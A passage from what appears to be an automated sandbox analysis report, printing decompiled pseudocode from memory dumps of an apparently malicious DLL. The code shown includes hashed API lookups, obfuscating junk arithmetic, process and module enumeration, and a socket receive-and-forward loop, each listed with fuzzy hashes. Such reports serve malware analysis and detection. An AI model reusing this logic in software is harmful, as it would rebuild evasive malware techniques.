    						_t104 = E6E4B2640(_t187, 1);
    						_t208 = _t197 + 8;
    						_t181 = _t104;
    						_t192 = 0;
    						_t149 = _v48;
    						0;
    						0;
    						do {
    							 *_t149 =  *(_t193 + _t192 - 0x1b) & 0x000000ff;
    							_t149 = _t149 + 1;
    							_t192 = E6E4B2640(0, E6E4B2640(0, 1) - _t192);
    							_t109 = E6E4B4C00(_t108, _t181);
    							_t208 = _t208 + 0x18;
    							_t236 = _t109 & 0x00000001;
    						} while ((_t109 & 0x00000001) == 0);
    						_v48 = _t149;
    						goto L25;
    						L4:
    						_t81 = E6E4BD6D0(_t236, _t155, _v24);
    						_t197 = _t197 + 8;
    						_t77 = _v48;
    					} while ((_t81 & 0x00000001) != 0);
    					goto L26;
    				}
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 9d02874457a2e2f35eab7e7807defa8bb27cd0e622c954fa4e2b138c00a92564
    • Instruction ID: add99d31cca364095202aac833ae82c4007e0908c64d6c5993f53d43932d5f12
    • Opcode Fuzzy Hash: 9d02874457a2e2f35eab7e7807defa8bb27cd0e622c954fa4e2b138c00a92564
    • Instruction Fuzzy Hash: EF914AB5E442155BDF004AF8AC95FEE7B789B1631DF08066AEC44773C2E6354A0887F2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4CEAB0(void* __eflags, char* _a4) {
    				char _v20;
    				signed char _v21;
    				signed char _v22;
    				char _v28;
    				char _t37;
    				void* _t39;
    				intOrPtr _t41;
    				void* _t43;
    				signed char _t47;
    				char* _t49;
    				void* _t50;
    				char* _t51;
    				void* _t52;
    				void* _t53;
    				void* _t58;
    
    				_t51 = _a4;
    				_t37 = E6E4BA9B0(_t51);
    				_t53 = _t52 + 4;
    				_v28 = _t37;
    				if(_t37 >= 0) {
    					_t49 = _t51;
    					_t43 = 0;
    					_t50 = 0;
    					if( *_t49 == 0x5c) {
    						L6:
    						_v20 = E6E4B2640(0, _t43);
    						_t39 = E6E4B2640(0, 1);
    						_t49 = _a4;
    						_t53 = _t53 + 0x10;
    						_t41 =  *((intOrPtr*)(_t49 - _t39 + _v20));
    						_t47 = _t41 + 0xde;
    						if(_t47 > 0x56) {
    							goto L3;
    						} else {
    							_v20 = 0;
    							switch( *((intOrPtr*)((_t47 & 0x000000ff) * 4 +  &M6E4D30D4))) {
    								case 0:
    									_v20 = _t41;
    									goto L22;
    								case 1:
    									goto L3;
    								case 2:
    									L22:
    									_t43 = _t43 + 1;
    									E6E4B6CC0(_t60, _t43, 1);
    									_t49 = _a4;
    									_t53 = _t53 + 8;
    									_t37 = _v20;
    									goto L4;
    								case 3:
    									__al = 7;
    									_v20 = __eax;
    									goto L22;
    								case 4:
    									__al = 8;
    									_v20 = __eax;
    									goto L22;
    								case 5:
    									__al = 0xc;
    									_v20 = __eax;
    									goto L22;
    								case 6:
    									__al = 0xa;
    									_v20 = __eax;
    									goto L22;
    								case 7:
    									__al = 0xd;
    									_v20 = __eax;
    									goto L22;
    								case 8:
    									__al = 9;
    									_v20 = __eax;
    									goto L22;
    								case 9:
    									__al = 0xb;
    									_v20 = __eax;
    									goto L22;
    								case 0xa:
    									__cl =  *((intOrPtr*)(__edx + __ebx + 2));
    									_v20 = __ecx;
    									__al =  *((intOrPtr*)(__edx + __ebx + 3));
    									_v21 = __al;
    									__eax = __ecx;
    									__al = __al + 0xd0;
    									__al & 0x000000ff = E6E4BD390(__eflags, __al & 0x000000ff, 0xa);
    									__ecx = _v20;
    									__eflags = __al & 0x00000001;
    									if((__al & 0x00000001) != 0) {
    										L19:
    										__al = _v21;
    										__al = _v21 + 0xd0;
    										_v22 = __al;
    										__eax = E6E4B27A0(0x86);
    										__cl = _v21;
    										__eflags = _v22 - __al;
    										if(_v22 >= __al) {
    											__eax = __ecx;
    											__al = __al + 0xbf;
    											__eflags = __al - 6;
    											if(__al >= 6) {
    												__eflags = __cl - 6;
    												if(__eflags >= 0) {
    													goto L22;
    												}
    											}
    										}
    									} else {
    										__eax = __ecx;
    										__al = __al + 0x9f;
    										__eflags = __al - 6;
    										if(__al < 6) {
    											goto L19;
    										} else {
    											__eax = __ecx;
    											__eflags = __al - 5;
    											if(__eflags > 0) {
    												goto L22;
    											} else {
    												goto L19;
    											}
    										}
    									}
    									goto L23;
    							}
    						}
    					} else {
    						L3:
    						_t37 =  *((intOrPtr*)(_t49 + _t43));
    						L4:
    						 *_t51 = _t37;
    						_t50 = _t50 + 1;
    						_t51 = _t51 + 1;
    						_t58 = _t43 - _v28;
    						_t43 = _t43 + 1;
    						if(_t58 < 0) {
    							if( *((char*)(_t49 + _t43)) != 0x5c) {
    								goto L3;
    							} else {
    								goto L6;
    							}
    						}
    					}
    				}
    				L23:
    				return _t37;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 53abd5dae149a42c347f5b2e26753cc5c83b7dd0a8be8be4483cde5ded23f1cd
    • Instruction ID: 8058a99a8762c2ab9e7019e44302f3a32ff9f94bf846340a5e5640d6ebd08b9b
    • Opcode Fuzzy Hash: 53abd5dae149a42c347f5b2e26753cc5c83b7dd0a8be8be4483cde5ded23f1cd
    • Instruction Fuzzy Hash: 1361F468D442569FDB008FF89C92EFFBBB1AB02748F000827E6415B341E775455687E3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E6E4C9BF0(void* __eflags, intOrPtr _a4, void _a8, intOrPtr _a12) {
    				intOrPtr _v20;
    				char _v24;
    				intOrPtr _v276;
    				intOrPtr _v280;
    				char _v284;
    				char _v1308;
    				signed int _t30;
    				intOrPtr* _t32;
    				void* _t33;
    				intOrPtr* _t35;
    				void* _t36;
    				intOrPtr* _t39;
    				intOrPtr* _t40;
    				intOrPtr _t41;
    				intOrPtr* _t42;
    				void* _t43;
    				signed int _t44;
    				void* _t59;
    				void* _t60;
    				void* _t61;
    				void* _t62;
    				void* _t66;
    				void* _t69;
    
    				_v24 = 0;
    				_v20 = E6E4B8AE0(0x82f7c2c);
    				_v284 = 2;
    				_v280 = _a4;
    				_v276 = _a8;
    				_t30 = E6E4B8AE0(0x82efa8a);
    				_t32 = E6E4CF5C0(_t30, E6E4B8AE0(0xfb2d128));
    				_t66 = _t62 + 0x14;
    				_t33 =  *_t32(0,  &_v284, 0, 0,  &_v24);
    				if(_t33 != 0xffffffff) {
    					_t59 = _t33;
    					if(_a12 != 0) {
    						L5:
    						_t35 = E6E4CF5C0(0, E6E4B8AE0(0x8571068));
    						_t36 =  *_t35(_a12, 0);
    						_t33 = E6E4B8AE0(0x82efb8e);
    						_t66 = _t66 + 0x10;
    						if(_t36 == _t33) {
    							goto L6;
    						}
    					} else {
    						do {
    							L6:
    							if(_t59 <= 0 || _v284 == 0) {
    								L3:
    								_v284 = 2;
    								_v280 = _a4;
    								_v276 = _a8;
    								_t39 = E6E4CF5C0(6, 0x79c2ba4);
    								_t66 = _t66 + 8;
    								_t33 =  *_t39(0,  &_v284, 0, 0,  &_v24);
    								_t59 = _t33;
    								if(_t33 != 0xffffffff) {
    									goto L4;
    								}
    							} else {
    								_t44 = 0;
    								while(1) {
    									_t53 =  *((intOrPtr*)(_t61 + _t44 * 4 - 0x114));
    									_t40 = E6E4CF5C0(6, 0x78ba6);
    									_t69 = _t66 + 8;
    									_t33 =  *_t40( *((intOrPtr*)(_t61 + _t44 * 4 - 0x114)),  &_v1308, 0x400, 0);
    									if(_t33 <= 0) {
    										goto L13;
    									}
    									_t60 = _t33;
    									_t41 = _a4;
    									_t55 =  ==  ? _a8 : _t41;
    									_t42 = E6E4CF5C0(6, 0x79c44);
    									_t43 =  *_t42( ==  ? _a8 : _t41,  &_v1308, _t60, 0);
    									_t33 = E6E4B6CC0(_t53 - _t41, _t44, 1);
    									_t66 = _t69 + 0x10;
    									if(_t43 == _t60) {
    										_t44 = _t44 + 1;
    										if(_t44 < _v284) {
    											continue;
    										} else {
    											goto L3;
    										}
    									}
    									goto L13;
    								}
    							}
    							goto L13;
    							L4:
    						} while (_a12 == 0);
    						goto L5;
    					}
    				}
    				L13:
    				return _t33;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: ad7b5e008877cc75cfbd5e9f5a15df25e59c0797a85ee8023201058449e0a4b4
    • Instruction ID: 502c6cebe9ecdbb4226e7dd97289cc68c6f9350e0b7c987fb9b9b48dd1bfe291
    • Opcode Fuzzy Hash: ad7b5e008877cc75cfbd5e9f5a15df25e59c0797a85ee8023201058449e0a4b4
    • Instruction Fuzzy Hash: F441FB75D402197FEB509EB4DC42FEE72A4AB44B1DF100566EA09B7280FBB15B44CAE3
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E6E4B2DD0(signed int _a4, signed int _a8) {
    				void* _v8;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v37;
    				signed int _t40;
    				signed int _t45;
    				signed int _t46;
    				signed int _t48;
    				signed int _t49;
    				signed int _t55;
    				signed int _t57;
    				signed int _t70;
    				signed int _t78;
    				signed char _t92;
    				signed int _t96;
    				signed int _t103;
    
    				_t48 = _a8;
    				_t40 = _a4;
    				_t96 = _t40 ^ 0x082efa8c;
    				_v28 = _t48 ^ 0x7856dfe0;
    				_v32 = _t96;
    				_t55 = _t40 ^ _t96;
    				_v24 = _t55;
    				_t57 = (_t55 ^ _t40) - _t96;
    				_v37 = _t57;
    				_v36 = _t57 - _t40;
    				if((_v37 >> 0x0000001f ^ _t48 | _t40 ^ _v37) != 0) {
    					asm("sbb esi, ecx");
    					if(_v24 >= _t40 && (_v28 ^ _t48 | _v32 ^ _t40) != 0) {
    						_t92 = _v36 - _t40 + 0x24;
    						_v36 = _t92;
    						_v37 = (_t92 & 0x000000ff) * 0x7a;
    					}
    				}
    				if((_v36 >> 0x0000001f ^ _t48 | _t40 ^ _v36) != 0 || (_v28 ^ _t48 | _v32 ^ _t40) != 0 || (_v36 >> 0x0000001f ^ _t48 | _t40 ^ _v36) != 0) {
    					_t70 = _v37 + 0xad;
    					_v36 = _t70;
    					_t103 = (_v32 & _t70) + _t70;
    					_v24 = _t103;
    					_v20 = _t103 + _t70;
    				}
    				if((_v36 >> 0x0000001f ^ _t48 | _t40 ^ _v36) == 0 && ((_v28 ^ _t48 | _v32 ^ _t40) == 0 || (_t48 ^ _v28 | _v32 ^ _t40) != 0)) {
    					_t49 = _v20;
    					_t78 = _t49 + 0x2bf;
    					_v36 = _t78;
    					_t45 = (_t40 ^ _t78) + _t49;
    					_v20 = _t45;
    					_t46 = _t45 * _t78;
    					_v16 = _t46;
    					_v37 = _t46 - _v32;
    				}
    				 *0x6e4d50d4 = _v37;
    				return _v32;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 7ca4c830b702df7daa69a6577a6d5ac5cd57bad196e188d8bc4703f2e059a623
    • Instruction ID: f4dc7bb6731ff346f742b85f8619771a0695726005d705a7f5d1186bd55d5474
    • Opcode Fuzzy Hash: 7ca4c830b702df7daa69a6577a6d5ac5cd57bad196e188d8bc4703f2e059a623
    • Instruction Fuzzy Hash: A0414436E193225BC354CF79C54045BFBE29FC8650F16CA6EE89C9B348DA709D0687C6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4BB3D0(void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
    				void* _v16;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v33;
    				signed int _t43;
    				void* _t44;
    				signed int _t49;
    				signed int _t65;
    				signed int _t71;
    				signed char _t72;
    				signed int _t77;
    				signed int _t80;
    				signed int _t83;
    				signed int _t90;
    				signed int _t96;
    				signed int _t101;
    				signed int _t104;
    				intOrPtr _t106;
    				signed int _t107;
    				signed int _t108;
    				signed int _t120;
    
    				_t77 = _a16;
    				_t80 = _a12;
    				_t108 = _a8;
    				_t101 = _a4;
    				_v28 = _t108 | _t77;
    				_t43 = _t101 | _t80;
    				_v32 = _t43;
    				_t83 = (_t80 - _t43) * _t43;
    				_v24 = _t83;
    				_v33 = _t83 * _t101;
    				_t106 =  *0x6e4d50f0; // 0xff3ed4ff
    				_t44 = E6E4B8AE0(0xd8b0f307);
    				_t107 = _a12;
    				if(_t106 == _t44 && (_v28 ^ _t77 | _v32 ^ _t107) != 0) {
    					_t120 = _t108 ^ _t77 | _t107 ^ _a4;
    					if(_t120 == 0 && _t120 == 0) {
    						_t71 = _v33;
    						_t104 = _t71 | _v32;
    						_t72 = _t71 | _t104;
    						_v33 = _t72;
    						_v24 = _t104 | _t72;
    						E6E4B29C0(_t72, _t104 | _t72, _v32);
    						_v33 = _v24 ^ _v32;
    					}
    				}
    				if((_v28 ^ _t77 | _v32 ^ _t107) == 0 && (_v28 ^ _t77 | _v32 ^ _t107) != 0 && (_v24 >> 0x0000001f ^ _t77 | _t107 ^ _v24) != 0 && (_t77 ^ _v28 | _v32 ^ _t107) == 0) {
    					_t96 = _a4;
    					_t65 = (_v33 & 0x000000ff | _t96) + _t107 + _t107;
    					_v24 = _t65;
    					_v33 = _t65 * _t96;
    				}
    				_t49 = _v33 * _v24 + _v32;
    				_t90 = _t49 + 0xfa;
    				_v24 = _t90;
    				_v33 = _t49 * _t90;
    				 *0x6e4d50d4 = _v33;
    				return _v32;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID: CopyMenuRectShowWindow
    • String ID:
    • API String ID: 2474721864-0
    • Opcode ID: f64fe39b084d997700920b761f3cb9c565352b63ba3907d1717f7ca8e2b07e94
    • Instruction ID: 24cb4cd313c531374fdd37470a6dc36a0303c815f15766f5576e3e4b35a40a6d
    • Opcode Fuzzy Hash: f64fe39b084d997700920b761f3cb9c565352b63ba3907d1717f7ca8e2b07e94
    • Instruction Fuzzy Hash: 8B412C71718345AF8748CE79C89186FBBE5AFD8260F04882EF499CB755D630D9048B62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4B3E10(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
    				void* _v16;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v44;
    				signed int _v48;
    				signed int _v52;
    				signed int _v53;
    				signed int _t41;
    				signed int _t48;
    				signed int _t49;
    				signed int _t51;
    				signed char _t62;
    				signed int _t63;
    				signed int _t64;
    				signed int _t65;
    				signed int _t68;
    				signed char _t71;
    				signed int _t75;
    				signed int _t79;
    				signed int _t87;
    				signed int _t88;
    				signed int _t90;
    				signed int _t94;
    				signed int _t96;
    				void* _t98;
    
    				_t98 = (_t96 & 0xfffffff8) - 0x28;
    				_t90 = _a16;
    				_t41 = _a8;
    				_t63 = _a4;
    				_t71 = (_t63 ^ 0x00000158) + _t63;
    				_v53 = _t71;
    				_v52 = _t71 ^ _t63;
    				_t94 = _t63 ^ _a12;
    				_t75 = _t41 ^ _t90;
    				_v32 = _t75;
    				_v44 = _t75;
    				_v48 = _t94;
    				_t87 = _a12;
    				if((_t41 ^ _v53 >> 0x0000001f | _t63 ^ _v53) == 0) {
    					L2:
    					_t48 = _v52 * _t87 + _t87 + _v48;
    					_t64 = _t63 * _t48;
    					_v52 = _t64;
    					_t65 = _t64 - _t48;
    					_v36 = _t65;
    					_v53 = _t65 + 0x1a;
    				} else {
    					_t62 = E6E4BC9A0(_t87, _t90, _v53, _v53 >> 0x1f);
    					_t87 = _a12;
    					_t98 = _t98 + 0x10;
    					if((_t62 & 0x00000001) != 0) {
    						goto L2;
    					}
    				}
    				_t68 = _v53 * _t87;
    				_v52 = _t68;
    				_t49 = E6E4B8AE0(0x82efacc);
    				_t88 = _a12;
    				_t79 = _v53 + (_t49 & _t68);
    				_v53 = _t79;
    				_t51 = _t79;
    				_v52 = _t51 + _t88;
    				_v36 = _t51;
    				_v28 = _t51 ^ _t88;
    				if((_t90 ^ _v53 >> 0x0000001f | _t88 ^ _v53) != 0 && (_t94 | _v32) != 0) {
    					_v36 = 0xe1;
    					_v24 = 0xe1;
    					_v53 = 0x000000e1 ^ _v28 ^ _t88 | _v48;
    				}
    				 *0x6e4d50d4 = _v53;
    				return _v48;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: a02f3acef2e7eb855336c0577d12cc054bd873291ec5b422e5c8e18f5f67923c
    • Instruction ID: 22c2559693ec65816b444ff83b68fe36f7b5d5e5d094b9ae7c66a47700906cea
    • Opcode Fuzzy Hash: a02f3acef2e7eb855336c0577d12cc054bd873291ec5b422e5c8e18f5f67923c
    • Instruction Fuzzy Hash: F0318D71609742AFC708CF29C99196FFBE5ABD8210F44C82FF899C7741D634D9098BA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4BC9A0(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v29;
    				signed int _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				signed int _t33;
    				signed int _t35;
    				signed int _t47;
    				signed int _t48;
    				signed int _t62;
    				signed int _t65;
    				signed int _t66;
    				signed int _t72;
    				intOrPtr _t74;
    				signed int _t75;
    				signed int _t80;
    				signed int _t83;
    				signed int _t84;
    				signed int _t86;
    				signed int _t87;
    				signed int _t88;
    				signed int _t89;
    
    				_t83 = _a4;
    				_t65 = _a16 ^ _a8;
    				_t66 = _t83;
    				_t84 = _t83 ^ _a12;
    				_t86 = 0x2a1;
    				if((_t84 | _t65) == 0) {
    					_t86 = 0;
    				}
    				_v24 = _t86;
    				_t87 = _t86 ^ _t66;
    				_v28 = _t87;
    				_t88 = _t87 * _t66;
    				_v20 = _t88;
    				_t33 = E6E4B8AE0(0x82ef969);
    				_t89 = _a4;
    				_t35 = _t33 * _t88 | _v20;
    				_v20 = _t35;
    				_v28 = _t35 + _t89;
    				_t80 = _a8;
    				if((_t84 | _t65) != 0 && (_v20 >> 0x0000001f ^ _t80 | _t89 ^ _v20) != 0) {
    					_t62 = (_v28 | _t89) * 0x158;
    					_v36 = _t62;
    					_v20 = _t62 | 0x00000400;
    				}
    				if((_v36 >> 0x0000001f ^ _t80 | _t89 ^ _v36) != 0 && ((_v24 >> 0x0000001f ^ _t80 | _t89 ^ _v24) != 0 || (_v24 >> 0x0000001f ^ _t80 | _t89 ^ _v24) != 0 && (_t80 ^ _v36 >> 0x0000001f | _t89 ^ _v36) != 0)) {
    					_t47 = _v20;
    					_t72 = _a12 * _t47;
    					_v29 = _t72;
    					_t74 = _t72 + 0xe6;
    					_v40 = _t74;
    					_t75 = _t74 + _v24;
    					_v28 = _t75;
    					_t48 = _t47 & _t75;
    					_v44 = _t48;
    					_v20 = _t48 | _t75;
    				}
    				 *0x6e4d50b8 = _v20;
    				return _v24;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 915fce65ffc867555fe1647a7f803b593fe7d7338f876b76c605fa9f508fc500
    • Instruction ID: 4ee38b5b1236e85d19636f302773f1861ae409072fc579fc956b03e122cc3fe2
    • Opcode Fuzzy Hash: 915fce65ffc867555fe1647a7f803b593fe7d7338f876b76c605fa9f508fc500
    • Instruction Fuzzy Hash: BA312E71F1112A9B9F48DEB8CC925AFB7F1BB48310B04092AE915FB740D7709A008BE4
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.302129642.000000006E509000.00000040.00020000.sdmp, Offset: 6E509000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
    • Instruction ID: 871e8131f7825b1404df822fff07eab5314d251ecaa386c18a9fe10b315336b1
    • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
    • Instruction Fuzzy Hash: A81181733401019FDB54CE99DC90EA673EAEBD9230B25C566ED08CB319E636EC42C7A0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 43%
    			E6E4BEB90(intOrPtr _a4) {
    				intOrPtr _v32;
    				char _v44;
    				intOrPtr* _t8;
    				void* _t9;
    				intOrPtr* _t11;
    				void* _t12;
    				intOrPtr* _t13;
    				void* _t16;
    				intOrPtr* _t19;
    				void* _t25;
    				void* _t28;
    				void* _t29;
    				void* _t30;
    				void* _t31;
    
    				_t8 = E6E4CF5C0(0, 0x6aa0e84);
    				_t30 = _t29 + 8;
    				_t9 =  *_t8(4, 0);
    				if(_t9 == 0xffffffff) {
    					_t25 = 0xffffffff;
    				} else {
    					_t28 = _t9;
    					_v44 = 0x1c;
    					_t11 = E6E4CF5C0(0, 0xc75bea4);
    					_t31 = _t30 + 8;
    					_t12 =  *_t11(_t28,  &_v44);
    					_t25 = 0;
    					if(_t12 != 0) {
    						do {
    							_t16 = E6E4B2640(_t25, 0x4a799a56);
    							_t25 = E6E4B6CC0(_v32 - _a4, _t16 + (0 | _v32 == _a4), E6E4B8AE0(0x425760da));
    							_t19 = E6E4CF5C0(0, 0xc8c784);
    							_t31 = _t31 + 0x1c;
    							_push( &_v44);
    							_push(_t28);
    						} while ( *_t19() != 0);
    					}
    					_t13 = E6E4CF5C0(0, 0xb8e7db5);
    					 *_t13(_t28);
    				}
    				return _t25;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID: LibraryLoad
    • String ID:
    • API String ID: 1029625771-0
    • Opcode ID: 78c19a1216312c1cfce6844eb2e964833011aacae574a0d97138e7aa9814e196
    • Instruction ID: 06e61fc4789c65e290bac90490365ff9d142c6b63e754533424937ca2b119be9
    • Opcode Fuzzy Hash: 78c19a1216312c1cfce6844eb2e964833011aacae574a0d97138e7aa9814e196
    • Instruction Fuzzy Hash: 4A115C62E411043BE20069F46C42FEF35AC8BD556DF180526FA18F72C1FB75990541F7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E6E4D0230(intOrPtr _a4) {
    				intOrPtr _v20;
    				char _v84;
    				void* _t17;
    				void* _t19;
    				signed int _t21;
    				void* _t23;
    				signed int _t24;
    				intOrPtr* _t26;
    				signed int _t27;
    				signed int _t30;
    				intOrPtr _t32;
    				intOrPtr _t33;
    				void* _t35;
    				void* _t36;
    
    				_t17 = E6E4C3E90();
    				_t27 = 0;
    				if(_t17 != 0) {
    					_t32 =  *((intOrPtr*)(_t17 + 0xc));
    					_t26 =  *((intOrPtr*)(_t32 + 0xc));
    					_t33 = _t32 + 0xc;
    					if(_t26 != _t33) {
    						_v20 = _t33;
    						do {
    							_t19 = E6E4B4290(0xfab3);
    							_t36 = _t36 + 4;
    							if(( *(_t26 + 0x2c) & 0x0000ffff) >= _t19) {
    								goto L4;
    							} else {
    								_t21 =  *( *(_t26 + 0x30)) & 0x0000ffff;
    								_t30 = 0;
    								if(_t21 == 0) {
    									L3:
    									 *(_t35 + _t30 - 0x50) = 0;
    									E6E4B20E0(1,  &_v84);
    									_push(_t30);
    									_t23 = E6E4B8E60( &_v84);
    									_t36 = _t36 + 0xc;
    									_t33 = _v20;
    									if(_t23 == _a4) {
    										_t27 =  *((intOrPtr*)(_t26 + 0x18));
    									} else {
    										goto L4;
    									}
    									goto L14;
    								} else {
    									while(1) {
    										 *(_t35 + _t30 - 0x50) = _t21;
    										_t24 = E6E4B2640(0,  !_t30);
    										_t36 = _t36 + 8;
    										_t30 = _t24;
    										if(_t24 > 0x3e) {
    											goto L3;
    										}
    										_t21 = ( *(_t26 + 0x30))[_t30] & 0x0000ffff;
    										if(_t21 == 0) {
    											goto L3;
    										} else {
    											if(1 != 0) {
    												continue;
    											} else {
    												goto L3;
    											}
    										}
    										goto L15;
    									}
    									goto L3;
    								}
    								L15:
    							}
    							goto L14;
    							L4:
    							_t26 =  *_t26;
    						} while (_t26 != _t33);
    						_t27 = 0;
    					}
    				}
    				L14:
    				return _t27;
    				goto L15;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c97dda9801d8a4737c17aba470345ddfaa144c1ac0fa375451898c77f74ac10b
    • Instruction ID: c0fa505624c68513fe9827c150d23cc6e903418e7550e3ecf7d8c1ad58cbc124
    • Opcode Fuzzy Hash: c97dda9801d8a4737c17aba470345ddfaa144c1ac0fa375451898c77f74ac10b
    • Instruction Fuzzy Hash: 62115665E062264BDB908AF4D8B1EEF732AAB42B58F000467DC056B301FB61DD09C3F6
    Uniqueness

    Uniqueness Score: -1.00%

    Memory Dump Source
    • Source File: 00000000.00000002.302129642.000000006E509000.00000040.00020000.sdmp, Offset: 6E509000, based on PE: false
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
    • Instruction ID: b90fcdec93f74b256973447da9b2a3c64e27c759478f4c18c98e2eece154f37b
    • Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
    • Instruction Fuzzy Hash: 1801DE363042028FDB46CB6DD994EBDBBE8EBC2734B19C17EE54683616D235E945CA20
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E4B2730(signed short* _a4, signed short* _a8) {
    				signed short* _t7;
    				signed int _t9;
    				signed short* _t10;
    				signed int _t11;
    				void* _t12;
    				signed int _t13;
    
    				_t10 = _a8;
    				_t7 = _a4;
    				if( *_t10 != 0) {
    					_t13 =  *_t7 & 0x0000ffff;
    					if(_t13 == 0) {
    						L9:
    						return 0;
    					}
